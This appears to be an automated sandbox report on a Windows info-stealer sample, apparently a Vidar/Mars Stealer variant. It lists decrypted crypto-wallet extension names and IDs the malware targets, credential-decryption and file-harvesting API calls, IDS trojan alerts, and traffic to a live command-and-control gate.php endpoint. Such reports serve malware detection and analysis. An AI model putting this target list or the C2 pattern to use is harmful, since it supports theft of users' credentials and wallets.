Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Math Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: hnfanknocfeofbddgcijnmhnfnkdnaad
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Coinbase Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Guarda
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: blnieiiffboillknjnepogjhkgnoapac
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: EQUAL Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: cjelfplplebdjjenllpjcblmjkfcffne
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Jaxx Liberty
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BitApp Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: kncchdigobghenbbaddojjnnaogfppfj
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: iWallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: amkmjjmmflddogmhpjloimipbofnfjih
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Wombat
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MEW CX
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nanjmdknhkinifnkgdcggcfnhdaammmj
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GuildWallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nkddgncdjgjfcddamfgcmfnlhccnimig
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Saturn Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: fnjhmkhhmkbjkkabndcnnogagogbneec
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Ronin Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: cphhlgmgameodnhkjdmkpanlelnlohao
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: NeoLine
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nhnkbkgjikgcigadomkphalanndcapjk
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Clover Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: kpfopkelmapcoipemfendmdcghnegimn
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Liquality Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: aiifbnbfobpmeekipheeijimdpnlpgpp
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Terra Station
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: dmkamcknogkgcdfhhbddcghachkejeap
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Keplr
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: fhmfendgdocmcbmfikdcogofphimnkno
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Sollet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: cnmamaachppnkjgnildpdmkaakejnhae
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Auro Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Polymesh Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: flpiciilemghbmfalicajoolhkkenfel
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ICONex
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nknhiehlklippafakaeklbeglecifhad
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Nabox Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: hcflpincpppdclinealmandijcmnkbgn
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Temple
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: mnfifefkajgofkcjkemidiaecocnkjeh
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: TezBox
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: dkdedlpgdmmkkfjabffeganieamfklkm
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Cyano Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Byone
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: OneKey
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: cihmoadaighcejopammfbmddcmdekcje
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: LeafWallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: lodccjjbdhfakaekdiahmedfbieldgik
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: DAppPlay
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ijmpgkjfkbfhoebgogflfebnmejmfbml
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: BitClip
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Steem Keychain
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: onofpnbbkehpmmoabgpcpmigafmmnjhl
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Nash Extension
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: bcopgchhojmggmffilplmbdicgaihlkp
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Hycon Lite Client
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: klnaejjgbibmhlephnhpmaofohgkpgkd
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ZilPay
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: aeachknmefphepccionboohckonoeemg
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Coin98 Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Phantom
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: hifafgmccdpekplomjjkcfgodnhcellj
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Crypto.com
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: dngmlblcodfobpdpecaadgfbcggfjfnm
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Maiar DeFi Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ppdadbejkmjnefldpcdjhnkpbjkikoip
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Oasis
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: hpbgcgmiemanfelegbndmhieiigkackl
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MonstaWallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: fcckkdbjnoikooededlapcalpionmalo
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MOBOX
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: jccapkebeeiajkkdemacblkjhhhboiek
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Crust Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: mgffkfbidihjpoaomajlbgchddlicgpn
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Pali Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nphplpgoakhhjchkkhmiggakijnkhfnd
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: TON Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ldinpeekobnhjjdofggfgjlcehhmanlj
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Hiro Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: pocmplpaccanhmnllbbkpgfliimjljgo
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Slope Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: bhhhlbepdkbapadjdnnojkbgioiodbic
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Solflare Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: pgiaagfkgcbnmiiolekcfmljdagdhlcm
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Stargazer Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: cgeeodpfagjceefieflmdfphplkenlfk
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: EVER Wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: gjkdbeaiifkpoencioahhcilildpjhgh
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: partisia-wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: bgjogpoidejdemgoochpnkmdjpocgkha
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Ecto Wallet

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00408E30 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00408E30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00405450 memset,CryptStringToBinaryA,CryptStringToBinaryA,	0_2_00405450
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_004090C0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_004090C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00408AB0 CryptUnprotectData,	0_2_00408AB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00408D90 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00408D90

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Unpacked PE file: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.60900000.1.unpack

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.0.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00401280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00401090
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0040A150 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040A150
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0040B570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,	0_2_0040B570
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0040B110 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040B110
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_00407620 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00407620
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Code function: 0_2_0040B3A0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040B3A0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2022818 ET TROJAN Generic gate .php GET with minimal headers 192.168.2.4:49731 -> 179.43.170.230:80
Source: Traffic	Snort IDS: 2036654 ET TROJAN Win32/Vidar Variant/Mars Stealer Resources Download 179.43.170.230:80 -> 192.168.2.4:49731

Found C&C like URL pattern

Source: global traffic

HTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DTRQIEUAAI58YUAIHost: alpha.twinsources.shopContent-Length: 70268Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: alpha.twinsources.shop/gate.php

Source: Joe Sandbox View

ASN Name: PLI-ASCH PLI-ASCH

Source: global traffic	HTTP traffic detected: GET /gate.php HTTP/1.1Host: alpha.twinsources.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /request HTTP/1.1Host: alpha.twinsources.shopCache-Control: no-cacheCookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45
Source: global traffic	HTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DTRQIEUAAI58YUAIHost: alpha.twinsources.shopContent-Length: 70268Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45

Source: Joe Sandbox View

IP Address: 179.43.170.230 179.43.170.230

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://alpha.twinsources.shop/gate.php
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://alpha.twinsources.shop/gate.php(
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.0000000000667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://alpha.twinsources.shop/request
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F580000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F531000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1872701513.000000000F4BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe, 00000000.00000002.1855026120.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
